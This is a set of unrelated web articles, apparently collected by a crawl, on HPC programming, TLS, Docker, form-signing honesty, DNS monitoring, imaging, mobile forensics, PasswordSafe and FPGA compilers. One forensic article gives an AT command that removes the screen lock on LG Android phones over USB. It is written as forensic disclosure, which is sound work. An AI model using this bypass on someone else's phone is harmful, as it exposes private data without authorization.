But it's not clear that MPI can continue to dominate even in scientific software. Creating an MPI application necessitates very low-level understanding of data and process coordination. This requires significant recoding efforts for existing applications, and the level of detail that has to be managed by the programmer can make getting a verifiably correct software application that scales to tens of thousands of processors (or cores) a very expensive and time-consuming process.
Parallel languages have picked up momentum over the last several years because they offer a path to faster and more straightforward software development but, while their portability is growing, they are not yet as portable or 'future proofed' as MPI.
As the computing community struggles with this latest transition, we're finally at a point where HPC and commodity computing have more than shared chips in common. The trick will be working together to take the best of what we know works on a large scale, avoid trying the techniques we already know don't work, and arrive faster at a solution that benefits us all.

Cray J. Henry is director of the Defense Department's High Performance Computing Modernization Program. E-mail him at firstname.lastname@example.org. An abridged version of his comments appeared in the Sept. 24, 2007, issue of GCN.
Transport Layer Security or TLS, widely known also as Secure Sockets Layer or SSL, is the most popular application of public key cryptography in the world. It is most famous for securing web browser sessions, but it has widespread application to other tasks.
TLS/SSL can be used to provide strong authentication of both parties in a communication session, strong encryption of data in transit between them, and verification of the integrity of that data in transit.
TLS/SSL can be used to secure a broad range of critical business functions such as web browsing, server-to-server communications, e-mail client-to-server communications, software updating, database access, virtual private networking and others.
However, when used improperly, TLS can give the illusion of security even though communications have actually been compromised. It is important to keep certificates up to date and to check rigorously for error conditions.
In many, but not all applications of TLS, the integrity of the process is enhanced by using a certificate issued by an outside trusted certificate authority.
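To make the "check rigorously" advice concrete, here is a minimal sketch using Python's standard ssl module (our choice of tooling, not something this paper prescribes); the defaults it applies enforce exactly the practices described above:

```python
import ssl

# A client context with the safe defaults: certificates are validated
# against the system's trusted CAs, the hostname must match the
# certificate, and handshake failures raise errors instead of being
# silently ignored.
context = ssl.create_default_context()

# Raising the protocol floor is a recommended hardening step (an
# assumption of this sketch, not a requirement stated in the paper).
context.minimum_version = ssl.TLSVersion.TLSv1_2

# A real client would now wrap its socket, e.g.:
#   with socket.create_connection((host, 443)) as sock:
#       with context.wrap_socket(sock, server_hostname=host) as tls:
#           ...
```

The point of using `create_default_context()` rather than a bare `SSLContext` is that the strict settings come for free; weakening them requires a deliberate, visible step.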
This paper will explore how TLS works, best practices for its use, and the various applications in which it can secure business computing. | <urn:uuid:9fe758f4-4ae8-49bb-88c6-3d8710f57d91> | CC-MAIN-2017-09 | https://www.infosecurity-magazine.com/white-papers/best-practices-and-applications-of-tlsssl/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00454-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93628 | 237 | 3.421875 | 3 |
Docker started out as a means of creating single application containers, but has since grown into a widely used dev tool and runtime environment. It has been downloaded around two billion times, and Redmonk has said that “we have never seen a technology become ubiquitous so quickly.” The Docker registry stores container images and provides a central point of access which can be used to share containers. Users can either place images into the registry or obtain images from it to deploy directly from the registry. Despite its widespread growth and acceptance, Docker still retains its free open source roots, and hosts a free public registry for containers from which anyone can obtain official Docker images. Below is an infographic, discovered via Twistlock, which gives a really nice overview of container technologies.
By Jonquil McDaniel | <urn:uuid:4d0afe8c-bf11-45e7-bf9f-22e6062388ee> | CC-MAIN-2017-09 | https://cloudtweaks.com/2016/09/history-containers-rise-docker/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00223-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.965203 | 156 | 2.59375 | 3 |
What's the purpose of signing a form? On the simplest level, a signature is simply a way to make someone legally responsible for the content of the form. But in addition to the legal aspect, the signature is an appeal to personal integrity, forcing people to consider whether they're comfortable attaching their identity to something that may not be completely true.
Based on some figures in a new PNAS paper, the signatures on most forms are miserable failures, at least from the latter perspective. The IRS estimates that it misses out on about $175 billion because people misrepresent their income or deductions. And the insurance industry calculates that it loses about $80 billion annually due to fraudulent claims. But the same paper suggests a fix that is as simple as tweaking the form. Forcing people to sign before they complete the form greatly increases their honesty.
It shouldn't be a surprise that signing at the end of a form does not promote accurate reporting, given what we know about human psychology. "Immediately after lying," the paper's authors write, "individuals quickly engage in various mental justifications, reinterpretations, and other 'tricks' such as suppressing thoughts about their moral standards that allow them to maintain a positive self-image despite having lied." By the time they get to the actual request for a signature, they've already made their peace with lying: "When signing comes after reporting, the morality train has already left the station."
The problem isn't with the signature itself. Lots of studies have shown that focusing the attention on one's self, which a signature does successfully, can cause people to behave more ethically. The problem comes from its placement after the lying has already happened. So, the authors posited a quick fix: stick the signature at the start. Their hypothesis was that "signing one’s name before reporting information (rather than at the end) makes morality accessible right before it is most needed, which will consequently promote honest reporting."
To test this proposal, they designed a series of forms that required self reporting of personal information, either involving performance on a math quiz where higher scores meant higher rewards, or the reimbursable travel expenses involved in getting to the study's location. The only difference among the forms? Some did not ask for a signature, some put the signature on top, and some placed it in its traditional location, at the end.
In the case of the math quiz, the researchers actually tracked how well the participants had performed. With the signature at the end, a full 79 percent of the participants cheated. Somewhat fewer cheated when no signature was required, though the difference was not statistically significant. But when the signature was required on top, only 37 percent cheated—less than half the rate seen in the signature-at-bottom group. A similar pattern was seen when the authors analyzed the extent of the cheating involved.
Although they didn't have complete information on travel expenses, the same pattern prevailed: people who were given the signature-on-top form reported fewer expenses than either of the other two groups.
The authors then repeated this experiment, but added a word completion task, where participants were given a series of blanks, some filled in with letters, and asked to complete the word. These completion tasks were set up so that they could be answered with neutral words or with those associated with personal ethics, like "virtue." They got the same results as in the earlier tests of cheating, and the word completion task showed that the people who had signed on top were more likely to fill in the blanks to form ethics-focused words. This supported the contention that the early signature put people in an ethical state of mind prior to completion of the form.
But the really impressive part of the study came from its real-world demonstration of this effect. The authors got an unnamed auto insurance company to send out two versions of its annual renewal forms to over 13,000 policy holders, identical except for the location of the signature. One part of this form included a request for odometer readings, which the insurance companies use to calculate typical miles travelled, which are proportional to accident risk. These are used to calculate insurance cost—the more you drive, the more expensive it is.
Those who signed at the top reported nearly 2,500 miles more than the ones who signed at the end.
Although the authors don't say so explicitly, they suggest we'd be pretty stupid not to adopt this simple, inexpensive fix. Calling it a "gentle nudge," they note that putting signatures on top "does not impose on the freedom of individuals, it does not require the passage of new legislation, and it can profoundly influence behaviors of ethical and economic significance." The only caution they add is that we might eventually adapt to the difference, and its effect will lessen—or, as they put it, "individuals may find new 'tricks' to disengage from morality."
The Internet and the Domain Name System (DNS) are continually changing; domains are constantly created and existing ones are frequently modified. Cybercriminals change DNS records to hijack domains and redirect traffic to malicious websites.
The redirected traffic bypasses their hosts leaving organizations unaware that traffic is being diverted. This leaves businesses and customers at great risk.
“Farsight’s DNS Changes is the authoritative source of changes in Internet infrastructure.”
Whenever a new domain is created or a domain’s configuration changes, the DNS Changes channel highlights that change in real-time. This lets organizations easily monitor their DNS worldwide and alert on unauthorized changes due to operational accidents — or an attack.
The data is collected from the Farsight global DNS sensor array. The DNS Changes channel carries more than 200,000 observations per second, providing a holistic view of all DNS changes including:
A resource record (RR) is a single DNS record.
A resource record set (RRset) consists of all the resource records of a given type for a given rrname.
When the DNS Changes channel detects a never-before-seen RRset, it publishes that RRset to Channel 214 on SIE. It also annotates novel information about each RRset. These include individual RRs that have not been seen before and whether the RRset has changed from those previously seen for a Fully Qualified Domain Name (FQDN).
Data is presented as a time-stamped RRset, providing full context for observed changes as well as critical information for security investigators and operational change management.
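A consumer of such time-stamped RRset records might detect a change like this (a sketch only: the field names rrname, rrtype and rdata follow common passive-DNS conventions, and the actual channel's wire format may differ):

```python
def rrset_key(obs):
    # Identity of an RRset: normalized owner name plus record type.
    return (obs["rrname"].lower().rstrip("."), obs["rrtype"])

def rrset_changed(old_obs, new_obs):
    """Return True if two observations of the same RRset carry
    different data (order of records within the set is ignored)."""
    if rrset_key(old_obs) != rrset_key(new_obs):
        raise ValueError("observations describe different RRsets")
    return sorted(old_obs["rdata"]) != sorted(new_obs["rdata"])

before = {"rrname": "www.example.com.", "rrtype": "A",
          "rdata": ["192.0.2.1", "192.0.2.2"]}
after = {"rrname": "www.example.com.", "rrtype": "A",
         "rdata": ["192.0.2.2", "203.0.113.9"]}
```

Alerting on unauthorized changes then reduces to comparing each new observation against the last known-good RRset stored under the same key.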
It reports on global changes when existing domains purposely, inadvertently or maliciously: | <urn:uuid:7af60c17-afda-4e77-aa45-3947fe8aa5eb> | CC-MAIN-2017-09 | https://www.farsightsecurity.com/solutions/threat-intelligence-team/dns-changes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00575-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.919951 | 341 | 2.703125 | 3 |
For many organizations, web sites serve as mission critical systems that must operate smoothly to process millions of dollars in daily online transactions. However, the actual value of a web site needs to be appraised on a case-by-case basis for each organization. Tangible and intangible value of anything is difficult to measure in monetary figures alone.
Web security vulnerabilities continually impact the risk of a web site. When any web security vulnerability is identified, performing the attack requires using at least one of several application attack techniques. These techniques are commonly referred to as the class of attack (the way a security vulnerability is taken advantage of). Many of these types of attack have recognizable names such as Buffer Overflows, SQL Injection, and Cross-site Scripting. As a baseline, the class of attack is the method the Web Security Threat Classification will use to explain and organize the threats to a web site.
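The paper only names these classes; to make one concrete, here is a minimal, self-contained SQL Injection demonstration (using Python and an in-memory SQLite table invented for illustration) together with the standard parameter-binding fix:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def find_user_unsafe(name):
    # String concatenation lets crafted input rewrite the query itself.
    return conn.execute(
        "SELECT name FROM users WHERE name = '%s'" % name).fetchall()

def find_user_safe(name):
    # Parameter binding keeps the input as data, never as SQL.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()

payload = "nobody' OR '1'='1"   # classic injection string
```

The unsafe version returns every row when given the payload, because the injected `OR '1'='1'` clause is true for all rows; the safe version returns none.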
The Web Security Threat Classification will compile and distill the known unique classes of attack, which have presented a threat to web sites in the past. Each class of attack will be given a standard name and explained with thorough documentation discussing the key points. Each class will also be organized in a flexible structure. The formation of a Web Security Threat Classification will be of exceptional value to application developers, security professionals, software vendors or anyone else with an interest in web security. Independent security review methodologies, secure development guidelines, and product/service capability requirements will all benefit from the effort.
Download the paper in PDF format here. | <urn:uuid:254199e5-ed7c-4c14-9d3f-e27f4c0c373b> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2004/07/28/web-security-threat-classification/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00099-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.91939 | 304 | 2.6875 | 3 |
State agencies that help protect our land, water and air and manage our natural resources have -- well -- an environmental problem.
The regulations they enforce to reduce pollution and to ensure the wise use of trees, minerals, water and land are generating huge amounts of paper. Businesses must send in forms and documents to show they are abiding by the latest state and federal environmental regulations. Departments of environmental protection and natural resources have to churn out copies of the same documents for lawyers, federal bureaucrats and the public. It adds up to a lot of consumed trees, not to mention the side effects of pollution from pulp production and land development for offices and warehouses to store the paper.
At the same time, paper generated by the permits and regulations consumes scarce government resources to cover the filing, distribution and analysis of the documents. For example, Iowa's Air Quality Bureau processes permits that allow the controlled emission of air pollution in the state. In 1996, the bureau will issue only 283 permits, but one application for a permit can run 7,000 pages.
The bureau received as many as 3 million pages of documents this year, all of which have to be carefully analyzed to ensure the state doesn't allow too much pollution into the air. "We were in a real bind because of all the paper," said Peter Hamlin, chief of the Air Quality Bureau. "We've had to rent warehouse space to help out with storage."
In Utah, where water is a precious natural resource, the story is the same. An individual or business just can't drill a well or tap into nearby surface water. They have to obtain the rights to use the water through a special process that's administered by the state's Division of Water Rights, in the Department of Natural Resources.
Since 1897, Utah has been tracking all state water rights and has on file 8 million pages of documents, all of which are open to public access. As environmental controls tighten and management of limited resources becomes more complex, the amount of regulation in this field can only grow.
To avoid a regulatory collapse brought on by too much paper, state agencies are turning to imaging technology to alleviate the burden of storing, retrieving, distributing and processing documents. Advances in client/server technology, object-oriented software, document management, workflow, relational databases, high-speed scanners, CD-ROM storage and the Internet make the job of protecting and regulating the environment more manageable.
In a report produced by Vermont's Agency of Natural Resources, potential imaging applications include state land records, permit applications, publications, hazardous site manifests, well logs, engineering drawings and permit application site plans, hunting and fishing licenses, staff training and public education.
Despite the numerous possibilities, imaging is a relative newcomer to the field of environmental protection and natural resources. While the number of installations is growing, the imaging applications now in operation are few and their scale is often quite large. Take, for example, Florida's Department of Environmental Protection, which has installed a $7.5 million document imaging system to process documents for the statewide cleanup of underground storage tanks that are contaminating groundwater.
The project involved the complete reengineering of the department in charge of waste cleanup, and a massive backfile conversion of paper documents – of which the state has more than 7 million relating to underground storage tanks alone. The system was built by Digital Equipment Corp., using high-speed Alpha servers, an Oracle database management system and Highland Technologies' Highview imaging and workflow software.
According to John Willmott, bureau chief of the department's information services, the imaging system will significantly advance the department's ability to process the authorization and reimbursement for storage tank removal. "That, in turn, speeds up the protection of Florida's environment," he said.
Florida's removal and cleanup of underground tanks is a state problem, funded by state legislation. In Iowa, issuing permits that allow the controlled emission of air pollutants is a federal mandate, conducted under the 1990 Clean Air Act. Fortunately, the act stipulates that large polluters have to pay states a fee based on the amount of air pollution released. From that fee the state can fund the use of technology, such as imaging, to manage the information gathered on polluters.
When the Air Quality Bureau made plans to use the funds for imaging, the industries that paid the fees demanded a cost-benefit analysis first, to ensure the project wouldn't end up as an expensive boondoggle. "The results showed that the system would pay for itself in less than two years by cutting our labor costs," remarked Hamlin.
The bureau installed a $1.5 million imaging system in November, built by Wang and Radian International, a technology firm specializing in environmental projects. The 175-user system consists of Wang's imaging and workflow software, Hewlett-Packard servers, a Cygnet jukebox, an Oracle database, PCs running Microsoft Windows and UNIX workstations.
Not only does the imaging system automate the distribution of the permit documents to the bureau's staff, but it also adds value by running some basic calculations based on data that is read by the system's optical character reading software. "It will calculate the potential emissions generated by an applicant based on the data they submit," said Hamlin. "It's going to save our permit reviewers a tremendous amount of time."
In Pennsylvania, imaging is helping the state track the "who, what, when and where" concerning hazardous municipal and industrial waste. The state's Bureau of Land Recycling and Waste Management has installed a $1.2 million document management system that uses imaging to convert documents on hazardous waste manifests and related fee collections -- worth $35 million annually -- into a database of information for environmental analysts.
The system, which serves 24 users, can also process incoming faxes, electronic data interchange files, mainframe reports and e-mail messages. The software, an object-based electronic document management product suite, was developed by Vantage Technologies, a firm recently purchased by Wang.
According to Bureau Chief Jeff Beatty, the system's biggest benefit is the way it speeds up the flow of information. "That time savings allows us to collect fees much faster than in the past," he said. It has also allowed analysts to spend more time analyzing information and less time searching for it. "It's liberated our analysts in terms of time. That's a positive experience for us."
Public access is another service that environmental and natural resource departments must provide. By linking imaging systems with the Internet, states can extend access far beyond what was ever thought possible. Utah's Division of Water Rights has begun putting documents on the World Wide Web at: .
Iowa's Air Quality Bureau plans to do the same. Though, as Hamlin remarked dryly, "I can't imagine a lot of people will want to read this stuff. Some of it's pretty boring." | <urn:uuid:ba1f4382-5757-424c-9fd9-5e396a7063f1> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Imaging-Takes-on-the-Environment.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00095-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945205 | 1,396 | 2.71875 | 3 |
Article by Coleen Torres
Cell phones don’t feel newfangled but in truth they are. With innovation comes swift change, sometimes so swift that it is difficult for forensic scientists to keep up.
Criminals use cell phones in a variety of crimes and it is up to the forensic scientists to uncover their transgressions.
But where do they start? What are some complications that scientists encounter?
- Innovation - Change is the number one issue for forensic scientists to overcome. Even the cell phone manufacturers don’t always know how to retrieve information stored in new phones, so how can scientists retrieve the information? Staying up-to-date on new cell phones is challenging but not impossible. As fast as they are created, criminals come up with ways to abuse them. Strangely enough, this can be beneficial for forensic scientists. Using online tips can allow scientists to access information that would otherwise remain unreachable.
- Charge – Unlike computers, much of what is stored in a phone’s memory is reliant upon the battery. When the electricity goes, so does the information. Depending on what information you are looking for and how it is stored, battery or charger power is an essential thing to think about.
- SIM cards and removable media - SIM cards are the soul of a cell phone. They carry vital user information. Likewise, removable media, such as SD cards, can have lots of stored data on them. It is important that forensic scientists have the appropriate equipment to read and evaluate the data.
- Passwords – Password protection on cell phones is challenging to overcome, though not impossible. Depending on the model, passwords can be circumvented in several ways.
- Internet connection – The smarter cell phones become, the harder they are to examine. Using an internet connection instead of SMS or voice makes a forensic scientist’s job much more difficult.
- Quarantine – One thing that is often disregarded is the need to sequester the cell phone before analyzing it. New text messages can overwrite old material, and connections to the internet can invalidate old data. It is imperative to make sure the phone is isolated.
- Security augmentations - Forensic scientists must be especially alert when dealing with cell phones that have been improved in some way. Some users have the capability of putting in dead man’s switches, effectually wiping the contents after an action or a period of time. Malware can also be downloaded onto the phone, placing the computer systems in danger.
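Picking up the SIM-card point above: the ICCID printed on a SIM ends in a Luhn check digit, so an examiner's script can sanity-check a transcribed number before cataloguing it. The function below is an illustrative sketch, not part of any particular forensic suite:

```python
def luhn_ok(digits: str) -> bool:
    """Validate a numeric string whose last digit is a Luhn check
    digit, the scheme used by SIM ICCIDs (and payment card numbers)."""
    if not digits.isdigit():
        return False
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:      # double every second digit from the right
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
```

A failed check usually means a transcription error rather than tampering, but either way the number deserves a second look before it goes into a report.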
There are many more problems for forensic scientists to watch out for, but these are the seven most common. Tracing cell phone data is a laborious task, but it can be done. All it takes is a little investigation, a few tools, and a lot of persistence.
This is a guest post by Coleen Torres, blogger at Phone Internet. She writes about saving money on home phone, digital TV and high-speed Internet by comparing prices from providers in your area for standalone service or phone TV Internet bundles.
Talkback and comments are most welcome...
Cross-posted from Short Infosec | <urn:uuid:0a28721c-175e-4a53-920e-8b34ba377b2f> | CC-MAIN-2017-09 | http://www.infosecisland.com/blogview/20180-Seven-Problems-with-Cell-Phone-Forensics.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00271-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93011 | 629 | 3.25 | 3 |
by Oleg Davydov, CTO, Oxygen Forensics
Modern smartphones are much more than just a device for voice calls. Now they contain a lot of personal data – contact list, communication history, photos, videos, Geo tags etc. Most smartphones can also work as a modem.
Almost every modem is Hayes-compatible which means it supports commands of the AT language developed in 1977 by Hayes. Every model supports some basic set of commands which is defined by the manufacturer. Sometimes this set can be extended and can contain very interesting commands.
Let us study behavior of an LG smartphone. When you connect it to the computer by USB you get access to the modem automatically (pic. 1). What is peculiar for LG is that the modem is available even if the phone’s screen is locked.
Thanks to that, we can learn some useful information about the phone using AT commands even if the phone is protected by a password. (pic. 2).
To learn what commands are supported by this model we have to examine its firmware. For example, for Android smartphones we only need to research the file /system/bin/atd. The pictures 3-5 demonstrate some AT commands for LG G3 D855 found in this file.
It is clear that the phone supports most of the basic AT+ command set, which can be used to extract common information about it (pic. 5). But of most interest are LG's proprietary commands (commands of the AT% type). These commands (like AT%IMEIx, AT%SIMID, AT%SIMIMSI, AT%MEID, AT%HWVER, AT%OSCER, AT%GWLANSSID) return basic information about the phone. Among them hides a real pearl – the command AT%KEYLOCK (pic. 4). As you might guess, this command allows you to manage the screen lock state. In order to study this command's behavior we can run a debugger and use the cross-reference to find its handling function code. You can see this in pic. 6.
When the command AT%KEYLOCK is called, the corresponding function, depending on the argument count, calls either lge_set_keylock() or lge_get_keylock() function from the /system/lib/libatd_common.so library. Pic. 7 shows the code of function lge_set_keylock().
As you can see from pic. 8, if you pass to the function lge_set_keylock() the value “0” = 0x30, it will eventually call the function which would remove the screen lock whatever method had been used to lock it (you can use PIN, password, pattern or fingerprint to do that). Then it will return the string “KEYLOCK OFF” (pic. 8).
It becomes obvious that the command AT%KEYLOCK=0 allows you to remove the screen lock without any additional manipulations.
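A sketch of how a forensic script might drive this command over the phone's modem interface follows. The transport here is a fake in-memory modem so the logic is self-contained; with real hardware the port object would come from a serial library (an assumption of this sketch, not Oxygen's actual implementation):

```python
import io

def send_at_command(port, command, terminator=b"\r"):
    """Send one AT command and collect response lines until the modem
    answers OK or ERROR. `port` is any object with write()/readline();
    on real hardware it would be the phone's modem serial port."""
    port.write(command.encode("ascii") + terminator)
    lines = []
    while True:
        raw = port.readline()
        if not raw:                      # EOF / timeout
            break
        line = raw.strip().decode("ascii", "replace")
        if not line or line == command:  # skip blanks and command echo
            continue
        lines.append(line)
        if line in ("OK", "ERROR"):
            break
    return lines

class FakeModem:
    """In-memory stand-in for the phone so the sketch is testable."""
    def __init__(self, canned_reply):
        self.sent = b""
        self._reply = io.BytesIO(canned_reply)
    def write(self, data):
        self.sent += data
    def readline(self):
        return self._reply.readline()

modem = FakeModem(b"AT%KEYLOCK=0\r\nKEYLOCK OFF\r\nOK\r\n")
response = send_at_command(modem, "AT%KEYLOCK=0")
unlocked = "KEYLOCK OFF" in response
```

The "KEYLOCK OFF" string matches the response described above; an examiner's tool would check for it before attempting any further acquisition steps.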
It’s worth mentioning that this command only removes the screen lock without affecting user settings. The command works as described: it writes zero value (which means unlock) to the special RAM area which stores the value responsible for screen lock. This means the command does not modify ROM in any way. This behavior is forensically sound because no user data is touched and after reboot the smartphone will return to the locked state. The command does not allow the investigator to find the screen lock PIN / pattern / password; it just removes it for some time.
To perform this analysis we used an LG G3 D855 model (with V20g-SEA-XX firmware). However, the aforementioned AT commands have been proven to work on other LG smartphones as well (LG G4 H812, LG G5 H860, LG V10 H960 etc). All these models support this approach.
Therefore it’s more than easy to unlock the phone. All you need to have is an LG Android smartphone turned on and connected to a PC by USB. This backdoor is obviously left by LG for its service software but can be used for forensic purposes as well. But bear in mind that criminals can also use this approach.
Oxygen Forensics was founded in 2000 as a PC-to-Mobile Communication software company. This experience has allowed our team of mobile device experts to become unmatched in understanding mobile device communication protocols. With this knowledge, we have built innovative techniques into our Oxygen Forensic® Detective allowing our users to access much more critical information than competing forensic analysis tools. We offer the most advanced forensic data examination tools for mobile devices and cloud services. Our company delivers the universal forensic solution covering the widest range of mobile devices running iOS, Android, Windows Phone, BlackBerry and many others. Oxygen Forensic® products have been successfully used in more than 100 countries across the globe. More info at www.oxygen-forensic.com | <urn:uuid:9553f4f2-e531-4497-9766-b40c6b152a71> | CC-MAIN-2017-09 | https://articles.forensicfocus.com/2017/02/03/unlocking-the-screen-of-an-lg-android-smartphone-with-at-modem-commands/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00271-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.916174 | 1,003 | 2.984375 | 3 |
Everyone is aware that selecting passwords wisely and safeguarding them should be an important priority, yet most people need to remember so many passwords that it’s nearly impossible to do so. Because of the need to recall dozens of passwords and keep up with their rotation many people are forced to use insecure shortcuts such as storing passwords in an unencrypted file or overusing the same password on many systems. PasswordSafe is one solution to the problem.
PasswordSafe is intended to be a secure solution for maintaining a list of passwords. It uses a secure, encrypted database to store each password and can only be accessed by providing the master password. Originally developed by Bruce Schneier’s Counterpane Labs, it is now developed and administered by Jim Russell and Rony Shapiro as a SourceForge project. PasswordSafe can be downloaded here.
How is PasswordSafe more secure than storing passwords in a text file or database? All passwords within the database (called a safe) are encrypted using the Blowfish algorithm, also developed by Bruce Schneier, which has so far proven to be unbreakable. Provided a secure master password, referred to as the combination, has been chosen for the safe, no one should be able to decrypt the passwords stored within the safe, even if they obtain a copy of the file. For this reason, it is imperative to choose a strong master password. For guidance in selecting the master password, refer to Eric Wolfram’s “How to Pick a Safe Password“. Take caution to never lose or forget the combination (master password) for any safe. PasswordSafe intentionally has no way to recover a lost combination, because doing so would compromise its security.
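The strength guidance above can be made concrete with a quick entropy estimate (a rough model that assumes truly random selection; real-world attacks exploit human patterns, so these figures are an upper bound):

```python
import math

def entropy_bits(length, alphabet_size):
    """Bits of entropy for a password of `length` symbols drawn
    uniformly at random from an alphabet of `alphabet_size` characters."""
    return length * math.log2(alphabet_size)

weak = entropy_bits(8, 26)     # 8 lowercase letters: ~37.6 bits
strong = entropy_bits(14, 62)  # 14 mixed-case letters and digits: ~83.4 bits
```

Each added bit doubles the attacker's average work, which is why a longer master password from a larger alphabet pays off so quickly.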
Getting started with PasswordSafe
First, download and install the latest version of PasswordSafe, which is available for all Windows platforms, including WinCE. For Linux users, there is a forked version (from the old 1.x series) called MyPasswordSafe, but its use is beyond the scope of this article.
The first time PasswordSafe is started, the following dialog appears:
Select “Create new database” and a prompt for the master password appears.
Weak passwords are discouraged with the following prompt.
If this prompt appears, a different master password should be created.
The newly created safe looks like this:
To create a new entry choose “Add Entry” from the Edit menu.
The password above has been created using the Random Password generator button on the right.
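The generator button produces passwords like the one above. The underlying idea, picking characters uniformly at random from a chosen alphabet with a cryptographically secure source, takes only a few lines; this is a sketch of the concept, not PasswordSafe's actual algorithm:

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits

def generate_password(length: int = 12) -> str:
    """Pick `length` characters uniformly at random from ALPHABET,
    using the OS's cryptographically secure random source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

pw = generate_password()
```

Because the characters are chosen independently and at random, such passwords are strong against guessing but impossible to memorize, which is exactly why a tool like PasswordSafe is needed to hold them.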
A prompt will appear asking if the default username should be the one supplied for the first entry.
Once the entry has been created it will show up in the safe.
Now would be a good time to save the database by choosing “Save As” from the File menu. Once the file has been saved, the title bar will show the filename.
Using PasswordSafe is just as easy as it was to enter the sample password. To use the entry, right-click on it and choose “Copy Username to Clipboard”.
After pasting the username into the website, you can double-click on the entry to speed-copy the password to the Windows clipboard. Paste the password into the website and log in as usual.
After a period of inactivity, PasswordSafe will require re-entry of the safe’s combination.
As more and more passwords are added to PasswordSafe, it becomes desirable to switch to “Nested Tree View” from the View menu. This changes the default display to the following:
Entries are grouped into trees corresponding to each entry’s “group” field.
Changing Passwords with PasswordSafe
To change the password for a given entry, right-click on the entry and choose “Edit/View Entry”. The entry will then open for editing.
Click on “Show Password” and then “Generate” to generate a new password.
Once the password has been changed within PasswordSafe, don’t forget to update the actual website or system with the new password!
There are a few other more advanced features of PasswordSafe that haven’t been covered here, but they are adequately discussed in PasswordSafe’s help file. This introduction covers enough of the basics to get started using PasswordSafe for password management. Here’s to never again forgetting a password!
Researchers have found a way to make colors more vivid on an e-reader screen, which could lead to the creation of advanced displays and spawn the development of color e-books.
The researchers at the University of Michigan at Ann Arbor were able to trap narrow beams of light at different wavelengths, which ultimately reflect as color on a device. The colors remained in place from different viewing angles, and the technology could be applied to e-readers in the future, the researchers said in a statement.
That could lead to a new generation of color e-readers in which sunlight could be used as an ambient light source to display color images, much like existing e-ink displays, the researchers said. The technology could also eliminate the need for backlighting typically found in LCD displays. That could improve battery life of a device, as an LCD is considered the most power-hungry component in an e-reader or tablet.
The researchers were able to display only static images in a demonstration, but are working toward the display of moving color images in the future. The researchers were not immediately available for comment on when the technology would become commercially viable.
The top e-readers from Amazon and Barnes & Noble today have e-ink screens with grayscale displays, and tablets largely have LCD screens. Technology for e-ink color displays is available in only a handful of products like the Ectaco JetBook Color, but the refresh rates and resolution still don't match LCD screens. Qualcomm in 2011 introduced Mirasol color display technology, which made it to the Kyobo e-reader. However, Kyobo has been discontinued and Mirasol has failed to find adopters.
Researchers drew inspiration from a peacock tail, which shows different colors when reflecting specific wavelengths of light at specific angles. Mimicking the peacock concept, the researchers applied specific measurements to create slits that would reflect colors. A 40-nanometer-wide slit reflected cyan, a 60-nm slit reflected magenta, and a 90-nm slit reflected yellow. The light was trapped inside nanoscale metallic grooves and then redirected through the slits placed in different angles.
The researchers created a device to show the trapped light funneled through the slits. The grooves were fabricated and etched in a glass plate with a layer of silver. When light hit the surface, an electric field pulled in specific wavelengths of light and then funneled through the slits.
The research could lead to new reflective display screens that could show consistent colors from different viewing angles, the researchers said.
The research was published in the journal Nature on Feb. 1.
At SC09 this week, Mitrionics announced it has started to work on an experimental compiler that aims to make parallel programming architecture-agnostic. The goal of the work is to extend the Mitrion-C platform for FPGAs to multicore CPUs, cluster architectures, and eventually even GPGPUs. We asked Stefan Möhl, Mitrionics’ chief science officer and co-founder, to explain what’s behind the new technology and what prompted the decision to add support for other parallel architectures.
HPCwire: Can you tell us about the new programming capabilities of the Mitrionics platform that you announced here at the Supercomputing Conference?
Stefan Möhl: Well, we haven’t added new programming capabilities to the Mitrionics’ Accelerated Computing Platform yet. We are still in the proof-of-concept stage with this new compiler, but things look very promising. For this proof-of-concept compiler, the news is that existing Mitrion-C code, originally written for the MVP on FPGAs, will now also run on multicores and clusters. This initial proof-of-concept was made only to prove that the basic principles work, so there are limits to what code we can currently run. A production version of a portable programming language will require changes to Mitrion-C to make it less focused on what is needed for FPGA acceleration.
HPCwire: How does it work?
Möhl: The main challenge when porting between parallel architectures is that the level of granularity of the parallelism differs. For example, to parallelize code for vector processors, you would have to parallelize inner-most loops. To parallelize code for clusters, you would have to parallelize the outer-most loops. Doing general automatic parallelization (parallelization without re-writing the code) has not been solved, even after decades of research. Nor is there a general automatic way to transform one kind of parallelism into another.
Mitrion-C was originally developed as a programming language for the Mitrion Virtual Processor (MVP). The MVP is a hardware design for a compute engine specifically developed for high-performance execution in FPGAs. As such, it is full MIMD (Multiple Instruction stream, Multiple Data stream) at the individual instruction level, so it potentially executes every single instruction of the program in parallel. This can be thought of as a limit-case for parallelism. Mitrion-C is a C-family language that supports and aids the programmer in specifying the kind of parallelism that the MVP requires. It is roughly as similar to ANSI-C as Java or C# are, so it isn’t too unusual to use.
